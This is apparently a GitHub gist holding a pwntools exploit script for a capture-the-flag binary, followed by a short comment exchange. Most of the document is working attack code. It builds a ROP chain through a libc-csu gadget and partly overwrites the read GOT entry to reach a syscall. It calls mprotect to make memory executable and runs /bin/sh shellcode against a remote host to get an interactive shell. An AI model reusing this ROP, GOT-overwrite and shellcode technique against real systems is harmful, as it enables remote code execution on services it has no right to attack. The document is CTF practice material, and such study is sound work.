Skip to content

Instantly share code, notes, and snippets.

@PaulCher
Created April 9, 2017 19:53
Show Gist options
  • Save PaulCher/5e3f48f79b412c695f8c23bf4b48b60b to your computer and use it in GitHub Desktop.
Save PaulCher/5e3f48f79b412c695f8c23bf4b48b60b to your computer and use it in GitHub Desktop.
#!/usr/bin/env python
from pwn import *
context(os='linux', arch='amd64')
BINARY = './hard'
def call_func(func, rdi=0, rsi=0, rdx=0):
ucall = 0x04005A0
upop = 0x004005BA
p = ''
p += p64(upop)
p += p64(0)
p += p64(1)
p += p64(func)
p += p64(rdx)
p += p64(rsi)
p += p64(rdi)
p += p64(ucall)
p += 'A' * 56
return p
def exploit():
REMOTE = 1
if REMOTE:
r = remote('128.199.152.175', 10001)
else:
r = process(BINARY)
elf = ELF(BINARY)
shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
read = 0x400400
bin_sh = 0x601700
overwrite_read = 0x60100f
address_of_page = 0x601000
page_size = 0x1000
rwx = 7
read_ow = ''
read_ow += '\0' * 9 # padding
read_ow += '\x7e' # syscall lsb
shellcode = asm(shellcraft.amd64.sh())
p = ''
p += 'A' * 16 # padding
p += 'B' * 8 # rbp
p += call_func(elf.got['read'], 0, bin_sh, 0x40) # read(0, 0x601700, 0x20)
p += call_func(elf.got['read'], 0, overwrite_read, 0xa) # read(0, 0x601018, 0xa) # returns 0xa at $rax
p += call_func(elf.got['read'], address_of_page, page_size, rwx) # return to syscall with $rax = 0xa, which means mprotect(0x601000, 0x1000, 0x7);
p += p64(bin_sh)
r.send(p)
sleep(1)
r.send(shellcode)
sleep(1)
r.sendline(read_ow)
r.interactive()
if __name__ == '__main__':
exploit()
Copy link

ghost commented Apr 10, 2017

can i make a hypothesis that the syscall instruction is near the start of read function, so i can brute the last byte to get a shell??

@PaulCher
Copy link
Author

Hello, @ray-cp!

Well, syscall instruction was located right near the read function, so we don't even have to bruteforce to locate it, because we could get exact libc version.

Copy link

ghost commented Apr 14, 2017

thank you very much. :)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment